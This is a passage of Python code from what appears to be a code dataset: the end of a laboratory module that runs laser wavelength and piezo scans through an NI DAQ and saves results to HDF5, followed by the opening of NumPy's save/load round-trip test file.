        self.wavemeter = kwargs.get('wavemeter', None)
        self.wavemeter_ch = kwargs.get('wavemeter_ch', 2)
        # DAQ configuration: channels and device name.
        self.daq_ch = kwargs.get('daq_ch', ['ai0'])
        self.daq_dev = kwargs.get('daq_dev', 'Dev1')
        # Tap coupler ratios used to back out on-chip powers.
        self.Pin_ratio = kwargs.get('Pin_ratio', 2/98)
        self.Pout_ratio = kwargs.get('Pout_ratio', 1/10)
        self.Pmeter_in = kwargs.get('Pmeter_in', None)
        self.Pmeter_out = kwargs.get('Pmeter_out',None)
        # NOTE(review): the kwarg key '_top_shift ' has a typo AND a trailing
        # space, so callers cannot actually override _stop_shift — confirm
        # the intended key (presumably '_stop_shift').
        self._stop_shift = kwargs.get('_top_shift ',-1)
        # Downsampling factor for the plotted traces.
        self.sub = kwargs.get('sub', 200)
        init_notebook_mode(connected=True)

    def run(self):
        """Execute the scan; returns a dict with the acquired traces.

        Sequence: park the laser at the lower scan limit, (optionally) read
        the start wavelength from the wavemeter, arm the DAQ, start the
        laser sweep while a background thread reads the DAQ, then
        post-process, plot, and return the data. The many short sleeps
        give the instruments time to settle between commands.
        """
        lsr = self.lsr
        time.sleep(0.05)
        wlm = self.wavemeter
        time.sleep(0.5)
        lim = lsr.scan_limit
        print('LIMITS: {}'.format(lim))
        time.sleep(0.05)
        # Move the laser to the start of the scan range.
        lsr.lbd = lim[0]
        time.sleep(0.05)
        speed = lsr.scan_speed
        time.sleep(0.05)
        scan_time = np.diff(lim)[0]/speed
        print('-'*30)
        print('Limits: {} - {}nm'.format(lim[0], lim[1]))
        print('Scan Speed: {} nm/s'.format(speed))
        print('Scan Time: {}s'.format(scan_time))
        # Poll until the laser has settled within 0.5 nm of the start point.
        while lsr._is_changing_lbd or np.abs(lsr.lbd -lim[0])>0.5 :
            print('setting lbd: {:.3f}nm'.format(lsr.lbd),end = "\r")
            time.sleep(0.1)
        print('setting lbd: {:.3f}nm'.format(lsr.lbd))
        # -- Wait for stabilization --
        # -----------------------------------------------
        time.sleep(1)
        if wlm:
            # Configure the wavemeter and read the true start wavelength.
            wlm.pulsemode = False
            wlm.widemode = False
            wlm.fastmode = False
            wlm.channel = self.wavemeter_ch
            wlm.exposure = 'auto'
            wlm.acquire = True
            print('-'*30)
            print('Getting Wavemeter for Start Wavelength:')
            time.sleep(2.5)
            lbd_start = wlm.lbd
            wlm.acquire = False
            print("\tWavelength Start {:.3f}".format(lbd_start))
        else:
            # No wavemeter: trust the laser's own wavelength readout.
            lbd_start = lsr.lbd
        # Setup the DAQ
        ch = self.daq_ch
        dev = self.daq_dev
        system = nidaqmx.system.System.local()
        device = system.devices[dev]
        device.reset_device()
        clk = 0.5e6  # sample clock (Hz)
        Npts = scan_time*clk  # total samples to cover the whole sweep
        self.readtask = nidaqmx.Task()
        if not type(ch)==list:
            ch = [ch]
        # Build "Dev1/ai0,Dev1/ai23"-style channel string.
        ch = dev + '/' + ',{}/'.format(dev).join(ch)
        print('-'*30)
        print('Setting up DAQ')
        print('\tReading from {}'.format(ch))
        print('\tNpts: {}'.format(Npts))
        self.readtask.ai_channels.add_ai_voltage_chan(ch,min_val=-0.5, max_val=10)
        self.readtask.timing.cfg_samp_clk_timing(clk, sample_mode=AcquisitionType.CONTINUOUS, samps_per_chan=int(Npts))
        # daq.SetupRead(read_ch=['ai0', 'ai23'])
        self._daqScanning = True
        self.data = []
        self.dt = []
        self._done_get_data = False
        def _GetData():
            # Background worker: one blocking DAQ read for the full sweep.
            self.time_start_daq = time.time()
            self.data += self.readtask.read(number_of_samples_per_channel=int(Npts), timeout = scan_time*1.5)
            self.time_end_daq = time.time()
            print('*'*30)
            print('Got DAQ data')
            self.readtask.stop()
            self.readtask.close()
            self.data = np.array(self.data)
            self._done_get_data = True
        threadDAQdata = threading.Thread(target=_GetData, args=())
        threadDAQdata.daemon = True
        # lim = lsr.scan_limit
        print(lim)
        # Start the sweep and the acquisition together, and log the laser
        # wavelength while the sweep runs (used later for interpolation).
        lsr.scan = True
        self.readtask.start()
        t1 = time.time()
        _lbdscan = [lsr.lbd]
        # t_scan =
        threadDAQdata.start()
        print('-'*20 + 'Start Scan')
        print(lim)
        while _lbdscan[-1] <= lim[1] + self._stop_shift:# or not(lsr._lim[0] <= _lbdscan[-1] <= lsr._lim[1]):
            _lbdscan += [lsr.lbd]
            print('\t lbd: {:.3f}'.format(_lbdscan[-1]), end = '\r')
            time.sleep(0.001)
        lsr.scan = False
        self._daqScanning = False
        t2 = time.time()
        print('\t lbd: {:.3f}'.format(lsr.lbd))
        print('-'*20 + 'End Scan')
        t_end = t2-t1
        print("\tTime taken for scan: {}s".format(t_end))
        # NOTE(review): busy-wait without a sleep; burns a core until the
        # DAQ thread finishes — consider threadDAQdata.join() instead.
        while not self._done_get_data:
            print('Waiting for the DAQ data', end = '\r')
        # assumes two acquired channels: [0]=transmission, [1]=MZ reference
        # — TODO confirm when daq_ch has a different length.
        T = self.data[0]
        MZ = self.data[1]
        # Map DAQ sample times onto the logged wavelength trace.
        t_daq = np.linspace(0,self.time_end_daq-self.time_start_daq, T.size)
        _lbdscan = np.array(_lbdscan)
        t_scan = np.linspace(0, t_end, _lbdscan.size)
        lbdscan = np.interp(t_daq, t_scan,_lbdscan)
        # Keep only the samples acquired while the sweep was running.
        ind = np.where(t_daq<=t_end)
        t_daq = t_daq[ind]
        T = T[ind]
        MZ= MZ[ind]
        lbdscan = lbdscan[ind]
        # -- Get Input and Output Power --
        # --------------------------------------------------------
        if self.Pmeter_in:
            self.Pmeter_in.lbd = 1050
            Pin = self.Pmeter_in.read*self.Pin_ratio
            Pin = 10*np.log10(Pin*1e3)  # W -> dBm
            # self.Pmeter_in._instr.close()
            print('-'*30)
            print('Power:')
            print('\tInput Power {:.3f}dBm'.format(Pin))
            if self.Pmeter_out:
                self.Pmeter_out.lbd = 1050
                Pout = self.Pmeter_out.read*self.Pout_ratio
                Pout = 10*np.log10(Pout*1e3)
                # self.Pmeter_out._instr.close()
                print('\tOutput Power {:.3f}dBm'.format(Pout))
                print('\tInsertion losses: {:.3f}dB'.format(Pin-Pout))
            else:
                Pout = None
        elif self.Pmeter_out:
            Pin = None
            self.Pmeter_out.lbd = 1050
            # NOTE(review): divides by Pout_ratio here but multiplies in the
            # branch above — confirm which is correct. Also the next print
            # of Pin-Pout will raise TypeError since Pin is None here.
            Pout = self.Pmeter_out.read/self.Pout_ratio
            Pout = 10*np.log10(Pout*1e3)
            # self.Pmeter_out._instr.close()
            print('\tOutput Power {:.3f}dBm'.format(Pout))
            print('\tInsertion losses: {:.3f}dB'.format(Pin-Pout))
        else:
            Pin = None
            Pout = None
        if wlm:
            # Read the true end wavelength from the wavemeter.
            wlm.pulsemode = False
            wlm.widemode = False
            wlm.fastmode = False
            wlm.channel = self.wavemeter_ch
            wlm.exposure = 'auto'
            wlm.acquire = True
            print('-'*30)
            print('Getting Wavemeter for End Wavelength:')
            time.sleep(2.5)
            lbd_stop = wlm.lbd
            wlm.acquire = False
            print("\tWavelength End {:.3f}".format(lbd_stop))
        else:
            lbd_stop = lsr.lbd
        # downsample the data for plotting (factor self.sub)
        dataT = np.array([lbdscan, T]).T
        dataMZ = np.array([lbdscan, MZ]).T
        # ipdb.set_trace()
        if self.sub >1:
            dataTsmall = np.array([lbdscan[::self.sub], T[::self.sub]]).T
            dataMZsmall = np.array([lbdscan[::self.sub], MZ[::self.sub]]).T
        else:
            dataTsmall = dataT
            dataMZsmall = dataMZ
        # # -- Dictionarry of full data --
        # --------------------------------------------------------
        full_data = {'lbd_start': lbd_start,
                     'lbd_stop': lbd_stop,
                     'lbd_scan': lbdscan,
                     'T': T,
                     'MZ': MZ,
                     'tdaq': t_daq,
                     'Pin': Pin,
                     'Pout': Pout}
        # # f, ax = plt.subplots()
        # Plot the (normalized, downsampled) traces with plotly.
        trace0 = go.Scatter(
            x = dataTsmall[:,0],
            y = dataTsmall[:,1]/dataTsmall[:,1].max(),
            mode = 'lines',
            name = 'T')
        trace1 = go.Scatter(
            x = dataMZsmall[:,0],
            y = dataMZsmall[:,1]/dataMZsmall[:,1].max(),
            mode = 'lines',
            name = 'MZ')
        data = [trace1, trace0]
        layout = dict(xaxis = dict(title = 'Wavelength (nm)'),
                      yaxis = dict(title = 'Signal (V)', rangemode = 'tozero'),
                      )
        print('figure')
        fig = go.Figure(data=data, layout=layout)
        print('displaying figure')
        iplot(fig)
        # ax.plot(MZ[::100])
        # ax.plot(T[::100])
        # f.show()
        # # lbd, T_cal = MZCalibrate(full_data, 42649513.76655776)
        # self.f, self.ax = plt.subplots()
        # self.ax.plot(lbd*1e9,T_cal)
        # self.f.show()
        return full_data
class FreeRun():
    """Continuously acquire one DAQ channel and live-plot it with
    matplotlib's FuncAnimation (no laser sweep involved)."""

    def __init__(self,**kwargs):
        self.daq_ch = kwargs.get('daq_ch', 'ai0')
        self.daq_dev = kwargs.get('daq_dev', 'Dev1')
        self.lsr = kwargs.get('laser', None)

    def run(self):
        """Start a background thread that repeatedly reads the DAQ and
        updates a live plot. Returns immediately after starting it."""
        # -- set the laser piezo --
        clk = 0.1e6  # sample clock (Hz)
        T = 1/20  # acquisition half-period (s)
        # _laser = self.lsr
        # NOTE(review): Npts is a float; it is int()-cast at the DAQ calls
        # but passed as-is to np.linspace below, which modern numpy rejects.
        Npts = T*clk * 2
        # -- define the writting signal --
        t= np.linspace(0, 2*T, Npts)
        # -- setup the daq --
        dev = self.daq_dev
        ch = self.daq_ch
        system = nidaqmx.system.System.local()
        device = system.devices[dev]
        device.reset_device()
        if not type(ch)==list:
            ch = [ch]
        # Build "Dev1/ai0,Dev1/ai23"-style channel string.
        ch_read = dev + '/' + ',{}/'.format(dev).join(ch)
        # ch_read = ch_read + ',{}/{}'.format(dev,self.daq_probe)
        # -- Define the daq worker --
        def FetchDAQ(clk, Npts,dev, ch_read):
            # One blocking read of Npts samples; task is torn down each call.
            readtask = nidaqmx.Task()
            # print(ch_read)
            readtask.ai_channels.add_ai_voltage_chan(ch_read,min_val=0, max_val=5)
            readtask.timing.cfg_samp_clk_timing(clk, sample_mode=AcquisitionType.CONTINUOUS, samps_per_chan=int(Npts))
            data = readtask.read(number_of_samples_per_channel=int(Npts))
            readtask.close()
            return data
        # -- Define the Animation for Matplotlib --
        class MyDataFetchClass(threading.Thread):
            # Acquisition thread: refreshes self.X/self.Y, which the
            # FuncAnimation callback copies onto the plot lines.
            def __init__(self):
                threading.Thread.__init__(self)
                # self._data = dataClass
                self._period = 2*T+0.1
                self._nextCall = time.time()
                self._run = True
                self.clk = clk
                self.X = [[0,2*T]]
                self.Y = [[0, 5]]
                f, ax = plt.subplots()
                self.hLine = []
                self.hLine += ax.plot(self.X,self.Y)
                f.show()
                # Keep a reference to the animation so it isn't GC'd.
                self.ani = FuncAnimation(f, self.update, frames = 2000000,interval = 10)
                self.f_num = f.number
                # self.lsr = _laser
            def update(self, i):
                # Animation callback: push latest data onto the line(s).
                for ii in range(len(self.X)):
                    self.hLine[ii].set_data(self.X[ii], self.Y[ii])
            def run(self):
                # NOTE(review): loops forever — unlike PiezoScan's variant
                # there is no figure-closed check to break out.
                while True:
                    nt = int(Npts/2)
                    data = FetchDAQ(clk, Npts,dev, ch_read)
                    Trans = np.array(data[0])
                    self.X = [t]
                    self.Y = [Trans]
        fetcher = MyDataFetchClass()
        # fetcher.daemon = True
        fetcher.start()
# interact(Slide, x= widgets.FloatSlider(min=0,max=100, step = 0.01))
def PiezoSlide(lsr):
    """Display an ipywidgets slider that drives the laser piezo voltage."""
    def _on_slide(x):
        # Write the slider position straight to the laser piezo.
        lsr.pzt = x
    _ = interact(_on_slide, x= widgets.FloatSlider(description='Piezo:',min=0,max=100, step = 0.01, layout=Layout(width='100%')))
class PiezoScan():
    """Drive the laser piezo with a DAQ analog-output waveform while
    reading back transmission and a probe channel, live-plotted with
    matplotlib.
    """

    def __init__(self, **kwargs):
        """Collect configuration from keyword arguments.

        laser, Vmax/Vmin (piezo drive extremes, V), Vcoeff (amplifier
        gain), daq_ch/daq_write/daq_probe/daq_dev (DAQ channels and
        device), freq_scan (Hz), pzt_center (initial piezo setpoint).
        """
        self.lsr = kwargs.get('laser', None)
        self.Vmax = kwargs.get('Vmax', 140)
        # NOTE(review): default Vmin equals Vmax (140), which yields a flat
        # drive waveform — presumably meant to be 0; confirm.
        self.Vmin = kwargs.get('Vmin', 140)
        self.Vcoeff = kwargs.get('Vcoeff', 23)
        self.daq_ch = kwargs.get('daq_ch', 'ai0')
        self.daq_write = kwargs.get('daq_write', 'ao0')
        self.daq_probe = kwargs.get('daq_probe', 'ai16')
        self.daq_dev = kwargs.get('daq_dev', 'Dev1')
        self.freq_scan = kwargs.get('freq_scan', 20)
        self.pzt_center = kwargs.get('pzt_center', 0)

    def Triangle(self, T, Npts):
        """Return (t, y): a down-then-up triangle drive of period T,
        zero-padded by a quarter of the trace on each side.

        Fixes vs. original: removed the unreachable duplicate return and
        dead code after it, removed the unused local ``clk``, and cast
        Npts to int (np.linspace requires an integer sample count).
        """
        Npts = int(Npts)
        Vmax = self.Vmax / self.Vcoeff
        Vmin = self.Vmin / self.Vcoeff
        down = lambda x: x * (Vmin - Vmax) / (T * 0.5) + Vmax
        up = lambda x: x * (Vmax - Vmin) / (T * 0.5)
        t = np.linspace(0, 2 * T, Npts)
        x = t[np.where(t < T / 2)]
        y = list(down(x)) + list(up(x))
        # Pad a quarter-trace of zeros on both sides of the ramp.
        to_add = int(t.size / 4)
        y = list(np.zeros(to_add)) + y + list(np.zeros(to_add))
        return (t, np.array(y))

    def Slope(self, T, Npts):
        """Return (t, y): a single downward ramp from Vmax to Vmin over T,
        zero-padded by a quarter of the trace on each side.

        Same cleanups as Triangle (dead code removed, Npts cast to int).
        """
        Npts = int(Npts)
        Vmax = self.Vmax / self.Vcoeff
        # NOTE(review): unlike Triangle, Vmin is NOT divided by Vcoeff here;
        # kept as-is to preserve behavior — confirm whether intentional.
        Vmin = self.Vmin
        up = lambda x: -x * (Vmax - Vmin) / T + Vmax
        t = np.linspace(0, 2 * T, Npts)
        x = t[np.where(t <= T)]
        y = list(up(x))
        to_add = int(t.size / 4)
        y = list(np.zeros(to_add)) + y + list(np.zeros(to_add))
        return (t, np.array(y))

    def run(self):
        """Center the piezo, build the drive waveform, then start a
        background thread that writes it to the DAQ and live-plots the
        read-back channels until the figure window is closed."""
        # -- set the laser piezo --
        self.lsr.pzt = self.pzt_center
        Vmax = self.Vmax / self.Vcoeff
        Vcoeff = self.Vcoeff
        clk = 0.1e6  # sample clock (Hz)
        T = 1 / self.freq_scan
        # Bug fix: keep the sample count integral (was a float, which
        # np.linspace inside Slope/Triangle rejects on modern numpy).
        Npts = int(T * clk * 2)
        # -- define the writing signal --
        t, write = self.Slope(T, Npts)
        # -- setup the daq --
        dev = self.daq_dev
        ch = self.daq_ch
        system = nidaqmx.system.System.local()
        device = system.devices[dev]
        device.reset_device()
        if not type(ch) == list:
            ch = [ch]
        # "Dev1/ai0,Dev1/ai23"-style channel string, plus the probe channel.
        ch_read = dev + '/' + ',{}/'.format(dev).join(ch)
        ch_read = ch_read + ',{}/{}'.format(dev, self.daq_probe)
        ch_write = self.daq_write

        # -- Define the daq worker --
        def WriteAndFetchDAQ(clk, Npts, dev, ch_read, ch_write):
            # Write one period of the drive waveform while reading back
            # Npts samples; tasks are created and torn down each call.
            readtask = nidaqmx.Task()
            readtask.ai_channels.add_ai_voltage_chan(ch_read, min_val=-0.5, max_val=6)
            readtask.timing.cfg_samp_clk_timing(clk, sample_mode=AcquisitionType.CONTINUOUS, samps_per_chan=int(Npts))
            writetask = nidaqmx.Task()
            writetask.ao_channels.add_ao_voltage_chan("{}/{}".format(dev, ch_write))
            writetask.timing.cfg_samp_clk_timing(int(clk),
                                                 sample_mode=AcquisitionType.CONTINUOUS,
                                                 samps_per_chan=int(Npts))
            writetask.write(write, auto_start=False)
            writetask.start()
            data = readtask.read(number_of_samples_per_channel=int(Npts))
            readtask.close()
            writetask.close()
            return data

        # -- Define the Animation for Matplotlib --
        class MyDataFetchClass(threading.Thread):
            # Acquisition thread: refreshes self.X/self.Y; the
            # FuncAnimation callback copies them onto the plot lines.
            def __init__(self):
                threading.Thread.__init__(self)
                self._period = 2 * T + 0.1
                self._nextCall = time.time()
                self._run = True
                self.clk = clk
                self.X = [[0, self._period / 2]]
                self.Y = [[0, Vmax]]
                f, ax = plt.subplots()
                self.hLine = []
                x = np.linspace(0, t[-1], write.size)
                self.hLine += ax.plot(x, write)
                self.hLine += ax.plot(x, write)
                f.show()
                # Keep a reference so the animation isn't garbage-collected.
                self.ani = FuncAnimation(f, self.update, frames=2000000, interval=20)
                self.f_num = f.number

            def update(self, i):
                x = np.linspace(0, t[-1], write.size)
                for ii in range(len(self.X)):
                    self.hLine[ii].set_data(x, self.Y[ii])

            def run(self):
                # Acquire until the figure window is closed.
                while True:
                    if plt.fignum_exists(self.f_num):
                        data = WriteAndFetchDAQ(clk, Npts, dev, ch_read, ch_write)
                        Trans = np.array(data[0])
                        probe = np.array(data[2])
                        # X axis: probe voltage scaled back to piezo volts.
                        self.X = [probe * Vcoeff]
                        self.Y = [Trans]
                    else:
                        print('stop')
                        break

        fetcher = MyDataFetchClass()
        fetcher.start()
def ReadPmeter(Pmeter, ratio):
    """Placeholder: continuously display power-meter readings.

    The msvcrt-based implementation below is disabled (Windows-only);
    the function currently does nothing.
    """
    pass
    # while True:
    #     if msvcrt.kbhit():
    #         if ord(msvcrt.getch()) == 27:
    #             break
    #     else:
    #
    #         print("Power Read: {:.3f}uW".format(Pmeter.read*1e6 *ratio), end = "\r")
def SaveDCdata(data, path, fname):
    """Save a DCScan result dict to ``<path><fname>.h5``.

    ``path`` is concatenated directly with ``fname`` (callers pass a
    trailing separator). ``Pin``/``Pout`` of None are stored as [0].
    """
    fname = path + fname
    # Bug fix: the file handle was never closed; the context manager
    # guarantees the HDF5 file is flushed and closed even on error.
    with h5py.File('{}.h5'.format(fname), 'w') as h5f:
        h5f.create_dataset('lbd_start', data=[data['lbd_start']])
        h5f.create_dataset('lbd_stop', data=[data['lbd_stop']])
        h5f.create_dataset('lbd_scan', data=[data['lbd_scan']])
        h5f.create_dataset('T', data=data['T'])
        h5f.create_dataset('MZ', data=data['MZ'])
        h5f.create_dataset('tdaq', data=data['tdaq'])
        # ``is None`` instead of ``== None``: identity check avoids numpy's
        # elementwise comparison when a value is an array.
        h5f.create_dataset('Pin', data=[0] if data['Pin'] is None else [data['Pin']])
        h5f.create_dataset('Pout', data=[0] if data['Pout'] is None else [data['Pout']])
if __name__ == "__main__":
    # Manual-measurement script: configure the Toptica laser and build the
    # three acquisition helpers defined above.
    lsr = Toptica1050()
    lsr.connected = True
    lsr.scan_limit = [1020, 1070]
    lsr.scan_speed = 4
    daq_ch = ['ai0', 'ai23']
    # daq_ch = ['ai22']
    # wlm = Wavemeter()
    # Pmeter_in = ThorlabsP1xx(address='USB0::0x1313::0x807B::17121241::INSTR')
    # Pmeter_out = ThorlabsP1xx(address='USB0::0x1313::0x8072::P2009986::INSTR')
    Piezo = PiezoScan(laser=lsr, daq_ch=daq_ch, daq_dev='Dev3',
                      daq_probe='ai16', daq_write='ao0')
    Free = FreeRun(laser=lsr, daq_ch=['ai0'], daq_dev='Dev3')
    # Bug fix: ``TopticaWorker`` is not defined anywhere in this module
    # (NameError at runtime); the DC-scan worker defined above is DCScan.
    DC = DCScan(laser=lsr, wavemeter=None,
                daq_ch=daq_ch, daq_dev='Dev3',
                Pmeter_in=None, Pmeter_out=None,
                Pin_ratio=10, Pout_ratio=10)
    # data = work.run()
    # path = 'Z:/Microcombs/ACES/Measurement/20180504-TemperatureMeasurement'
    # fname = 'LigentechG3_1b11_RW810G520_600mW'
    # # io.savemat(path + '/' + fname + '.mat', data)
    # plt.close('all')
|
test_io.py | from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
import time
import warnings
import io
import re
import pytest
from tempfile import NamedTemporaryFile
from io import BytesIO, StringIO
from datetime import datetime
import locale
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import ConverterError, ConversionWarning
from numpy.compat import asbytes, bytes, Path
from numpy.ma.testutils import assert_equal
from numpy.testing import (
assert_warns, assert_, assert_raises_regex, assert_raises,
assert_allclose, assert_array_equal, temppath, tempdir, IS_PYPY,
HAS_REFCOUNT, suppress_warnings, assert_no_gc_cycles, assert_no_warnings
)
class TextIO(BytesIO):
    """Helper IO class.

    Writes encode strings to bytes if needed, reads return bytes.
    This makes it easier to emulate files opened in binary mode
    without needing to explicitly convert strings to bytes in
    setting up the test data.
    """

    def __init__(self, s=""):
        super(TextIO, self).__init__(asbytes(s))

    def write(self, s):
        super(TextIO, self).write(asbytes(s))

    def writelines(self, lines):
        super(TextIO, self).writelines([asbytes(line) for line in lines])
MAJVER, MINVER = sys.version_info[:2]  # running Python major/minor version
IS_64BIT = sys.maxsize > 2**32  # True on 64-bit builds; gates big-array tests

# Optional compression modules: record availability so tests can skip
# the corresponding suffixes when the module is missing.
try:
    import bz2
    HAS_BZ2 = True
except ImportError:
    HAS_BZ2 = False
try:
    import lzma
    HAS_LZMA = True
except ImportError:
    HAS_LZMA = False
def strptime(s, fmt=None):
    """Parse *s* with *fmt* and return a ``datetime`` (date fields only).

    Bytes input is decoded as latin1 first. Shim kept from the era when
    ``datetime.strptime`` required Python >= 2.5.
    """
    # Idiom fix: isinstance instead of an exact type comparison, so bytes
    # subclasses are decoded too.
    if isinstance(s, bytes):
        s = s.decode("latin1")
    return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
    # Base class: subclasses override ``roundtrip`` to save with a specific
    # function (np.save / np.savez) and reload; the shared test methods
    # below push many array kinds through that round trip.

    def roundtrip(self, save_func, *args, **kwargs):
        """
        save_func : callable
            Function used to save arrays to file.
        file_on_disk : bool
            If true, store the file on disk, instead of in a
            string buffer.
        save_kwds : dict
            Parameters passed to `save_func`.
        load_kwds : dict
            Parameters passed to `numpy.load`.
        args : tuple of arrays
            Arrays stored to file.
        """
        save_kwds = kwargs.get('save_kwds', {})
        load_kwds = kwargs.get('load_kwds', {"allow_pickle": True})
        file_on_disk = kwargs.get('file_on_disk', False)
        if file_on_disk:
            # delete=False: np.load reopens the file by name below, which
            # Windows does not allow on an auto-deleting temp file.
            target_file = NamedTemporaryFile(delete=False)
            load_file = target_file.name
        else:
            target_file = BytesIO()
            load_file = target_file
        try:
            arr = args
            save_func(target_file, *arr, **save_kwds)
            target_file.flush()
            target_file.seek(0)
            if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
                # Windows forbids reopening a file that is still open here.
                target_file.close()
            arr_reloaded = np.load(load_file, **load_kwds)
            # Stash both sides for the subclass's assertions.
            self.arr = arr
            self.arr_reloaded = arr_reloaded
        finally:
            if not isinstance(target_file, BytesIO):
                target_file.close()
                # holds an open file descriptor so it can't be deleted on win
                if 'arr_reloaded' in locals():
                    if not isinstance(arr_reloaded, np.lib.npyio.NpzFile):
                        os.remove(target_file.name)

    def check_roundtrips(self, a):
        # Exercise C-order, Fortran-order, and (when possible) arrays that
        # are neither, both in memory and on disk.
        self.roundtrip(a)
        self.roundtrip(a, file_on_disk=True)
        self.roundtrip(np.asfortranarray(a))
        self.roundtrip(np.asfortranarray(a), file_on_disk=True)
        if a.shape[0] > 1:
            # neither C nor Fortran contiguous for 2D arrays or more
            self.roundtrip(np.asfortranarray(a)[1:])
            self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)

    def test_array(self):
        # Empty, float, int, and complex (single/double) arrays.
        a = np.array([], float)
        self.check_roundtrips(a)
        a = np.array([[1, 2], [3, 4]], float)
        self.check_roundtrips(a)
        a = np.array([[1, 2], [3, 4]], int)
        self.check_roundtrips(a)
        a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
        self.check_roundtrips(a)
        a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
        self.check_roundtrips(a)

    def test_array_object(self):
        # Object arrays require allow_pickle (default load_kwds above).
        a = np.array([], object)
        self.check_roundtrips(a)
        a = np.array([[1, 2], [3, 4]], object)
        self.check_roundtrips(a)

    def test_1D(self):
        a = np.array([1, 2, 3, 4], int)
        self.roundtrip(a)

    @pytest.mark.skipif(sys.platform == 'win32', reason="Fails on Win32")
    def test_mmap(self):
        # Memory-mapped loads need an on-disk file.
        a = np.array([[1, 2.5], [4, 7.3]])
        self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
        a = np.asfortranarray([[1, 2.5], [4, 7.3]])
        self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})

    def test_record(self):
        a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
        self.check_roundtrips(a)

    @pytest.mark.slow
    def test_format_2_0(self):
        # A dtype with a huge header forces the 2.0 .npy format, which
        # emits a UserWarning — tolerated here.
        dt = [(("%d" % i) * 100, float) for i in range(500)]
        a = np.ones(1000, dtype=dt)
        with warnings.catch_warnings(record=True):
            warnings.filterwarnings('always', '', UserWarning)
            self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest):
    """Round-trip via np.save: value, dtype and Fortran-contiguity must survive."""

    def roundtrip(self, *args, **kwargs):
        RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
        saved = self.arr[0]
        reloaded = self.arr_reloaded
        assert_equal(saved, reloaded)
        assert_equal(saved.dtype, reloaded.dtype)
        assert_equal(saved.flags.fnc, reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest):
    # Round-trip via np.savez: multiple arrays per file, plus regression
    # tests for file-handle lifetime issues specific to NpzFile.

    def roundtrip(self, *args, **kwargs):
        RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
        try:
            # savez stores positional arrays under 'arr_0', 'arr_1', ...
            for n, arr in enumerate(self.arr):
                reloaded = self.arr_reloaded['arr_%d' % n]
                assert_equal(arr, reloaded)
                assert_equal(arr.dtype, reloaded.dtype)
                assert_equal(arr.flags.fnc, reloaded.flags.fnc)
        finally:
            # delete tempfile, must be done here on windows
            if self.arr_reloaded.fid:
                self.arr_reloaded.fid.close()
                os.remove(self.arr_reloaded.fid.name)

    @pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
    @pytest.mark.slow
    def test_big_arrays(self):
        # > 2**31 bytes: exercises 64-bit offsets in the zip container.
        L = (1 << 31) + 100000
        a = np.empty(L, dtype=np.uint8)
        with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
            np.savez(tmp, a=a)
            del a
            npfile = np.load(tmp)
            a = npfile['a']  # Should succeed
            npfile.close()
            del a  # Avoid pyflakes unused variable warning.

    def test_multiple_arrays(self):
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        self.roundtrip(a, b)

    def test_named_arrays(self):
        # Keyword arguments to savez become the archive member names.
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        c = BytesIO()
        np.savez(c, file_a=a, file_b=b)
        c.seek(0)
        l = np.load(c)
        assert_equal(a, l['file_a'])
        assert_equal(b, l['file_b'])

    def test_BagObj(self):
        # NpzFile.f exposes the archive members as attributes.
        a = np.array([[1, 2], [3, 4]], float)
        b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
        c = BytesIO()
        np.savez(c, file_a=a, file_b=b)
        c.seek(0)
        l = np.load(c)
        assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
        assert_equal(a, l.f.file_a)
        assert_equal(b, l.f.file_b)

    def test_savez_filename_clashes(self):
        # Test that issue #852 is fixed
        # and savez functions in multithreaded environment
        def writer(error_list):
            with temppath(suffix='.npz') as tmp:
                arr = np.random.randn(500, 500)
                try:
                    np.savez(tmp, arr=arr)
                except OSError as err:
                    error_list.append(err)
        errors = []
        threads = [threading.Thread(target=writer, args=(errors,))
                   for j in range(3)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        if errors:
            raise AssertionError(errors)

    def test_not_closing_opened_fid(self):
        # Test that issue #2178 is fixed:
        # verify could seek on 'loaded' file
        with temppath(suffix='.npz') as tmp:
            with open(tmp, 'wb') as fp:
                np.savez(fp, data='LOVELY LOAD')
            with open(tmp, 'rb', 10000) as fp:
                fp.seek(0)
                assert_(not fp.closed)
                np.load(fp)['data']
                # fp must not get closed by .load
                assert_(not fp.closed)
                fp.seek(0)
                assert_(not fp.closed)

    #FIXME: Is this still true?
    @pytest.mark.skipif(IS_PYPY, reason="Missing context manager on PyPy")
    def test_closing_fid(self):
        # Test that issue #1517 (too many opened files) remains closed
        # It might be a "weak" test since failed to get triggered on
        # e.g. Debian sid of 2012 Jul 05 but was reported to
        # trigger the failure on Ubuntu 10.04:
        # http://projects.scipy.org/numpy/ticket/1517#comment:2
        with temppath(suffix='.npz') as tmp:
            np.savez(tmp, data='LOVELY LOAD')
            # We need to check if the garbage collector can properly close
            # numpy npz file returned by np.load when their reference count
            # goes to zero. Python 3 running in debug mode raises a
            # ResourceWarning when file closing is left to the garbage
            # collector, so we catch the warnings. Because ResourceWarning
            # is unknown in Python < 3.x, we take the easy way out and
            # catch all warnings.
            with suppress_warnings() as sup:
                sup.filter(Warning)  # TODO: specify exact message
                for i in range(1, 1025):
                    try:
                        np.load(tmp)["data"]
                    except Exception as e:
                        msg = "Failed to load data from a file: %s" % e
                        raise AssertionError(msg)

    def test_closing_zipfile_after_load(self):
        # Check that zipfile owns file and can close it. This needs to
        # pass a file name to load for the test. On windows failure will
